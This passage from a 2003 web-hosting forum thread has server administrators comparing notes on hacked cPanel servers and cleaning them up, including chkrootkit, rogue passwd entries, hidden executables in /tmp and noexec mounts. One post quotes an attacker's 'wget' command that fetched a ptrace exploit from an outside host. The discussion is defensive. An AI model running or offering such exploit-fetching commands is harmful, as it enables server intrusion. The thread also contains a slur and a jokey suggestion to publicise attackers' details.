#16 (permalink)  
Old 12-24-2003, 12:49 AM
Registered User
 
Join Date: Aug 2001
Posts: 111
Diatone
http://www.delta5.com.br/mirror/topdefacer/

Those are the fags who got all of us... Trust me. Little HACKING COMPETITION> WOOO HOO FUN STUFF. I want to meet them face to face and see what the punk script kiddies have to say.
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #17 (permalink)  
Old 12-24-2003, 01:42 AM
Registered User
 
Join Date: Feb 2003
Posts: 301
compunet2
Most likely nothing you can do. See: http://grc.com/dos/grcdos.htm
I also had the same thing with TechTeam changing all the index files. I have since upgraded the kernel, changed the permission on the /tmp directory, removed compilers, and blocked their IP range, but would still like to know exactly how they did it, or if any of this would have stopped them. Also, how did you find out so much information about them anyway? Maybe you should make the info public, and see how they like it... lol
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #18 (permalink)  
Old 12-24-2003, 04:17 AM
Registered User
 
Join Date: Aug 2002
Posts: 108
ivaserver
my server provider killed the processes that were started by the hackers. This included a Half-Life server, an ircd and several unknown programs
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #19 (permalink)  
Old 12-24-2003, 06:13 AM
Registered User
 
Join Date: Aug 2002
Posts: 108
ivaserver
deleted

Last edited by ivaserver; 12-24-2003 at 07:49 AM.
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #20 (permalink)  
Old 12-29-2003, 03:47 PM
B12Org's Avatar
Registered User
 
Join Date: Jul 2003
Location: Seattle Washington
Posts: 603
B12Org is on a distinguished road
Quote:
Originally posted by brumie
oh yes just delete that uid
i seen that too and delete the user line:
pico /etc/passwd

but believe it or not there must be hidden process
run chkrootkit (search on this forum on how to install it)
also check on tmp

cd /tmp
ls -la

find weird unussual files/directory there
but it'll be good if u releod the OS and get kernel update and find some threads about securing whm/cpanel, i found it very usefull
What counts as wierd or unusal files/dirs?
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #21 (permalink)  
Old 12-29-2003, 10:59 PM
Registered User
 
Join Date: Dec 2003
Posts: 40
brumie
Quote:
What counts as wierd or unusal files/dirs?
files are excutebale

on the xmas day, my friend's server almost got hack
u should check that weird file:

so far we found this kind of files on several servers /tmp:
.xcgi
r00t
w00t
xp
xmas
gift
r0nin
anyname.c --> cc code compile able

i'm sure there must be lots way they trying to hack
sometimes they also mk directory name pretending like it was a session files

-rw------- 1 nobody nobody 0 Dec 29 10:51 sess_f7139ec439e5ad737c9c22723b140123
drwxr-xr-x 2 nobody nobody 4096 Dec 29 16:41 sess_f7139ec439e5ad737c9c22723b140xxx
-rw------- 1 nobody nobody 435 Dec 28 23:42 sess_fa205a6f3a4b7a5d3a3affb915522456

see the permission drwxr-xr-x
that's directory, the man that got our server was did with that way, i can't believe when i'm enter that directory and found many executable files there

anyway that was little story of my nightmares, i'm moving to another provider that helped me lots securing my box and watching like hawk
oh yeah i can sleep better....

suggestion: search thread on this forum about secure your box

set tmp with noexec:
http://forums.ev1servers.net/showthr...threadid=27771

correct me if i'm wrong
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #22 (permalink)  
Old 12-30-2003, 12:34 AM
B12Org's Avatar
Registered User
 
Join Date: Jul 2003
Location: Seattle Washington
Posts: 603
B12Org is on a distinguished road
Oh, ok. I wasnt sure if you meant obviously unusual files, or computer nerd obvious. Thanks.
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #23 (permalink)  
Old 12-30-2003, 06:51 AM
Registered User
 
Join Date: Dec 2002
Posts: 21
micron
Re: new server got hacked

Quote:
Originally posted by brumie
Code:
...
wget www.viperhaxu.hpg.com.br/ptrace
...
Here are your hackers. Looks like 13 year olds.
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #24 (permalink)  
Old 12-30-2003, 09:29 AM
B12Org's Avatar
Registered User
 
Join Date: Jul 2003
Location: Seattle Washington
Posts: 603
B12Org is on a distinguished road
That file that you referenced is empty text file. Looks like whatever it was, its gone now. My experience was with a group calling themselves "techteam". Some hackers they were, they had to make their web page with frontpage
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #25 (permalink)  
Old 04-29-2004, 12:00 PM
Registered User
 
Join Date: Apr 2004
Posts: 2
mc303
excellent resource of knowledge
Thank you
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Reply

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On



All times are GMT -5. The time now is 06:18 PM.


Powered by vBulletin® Version 3.8.2
Copyright ©2000 - 2010, Jelsoft Enterprises Ltd.
© cPanel Inc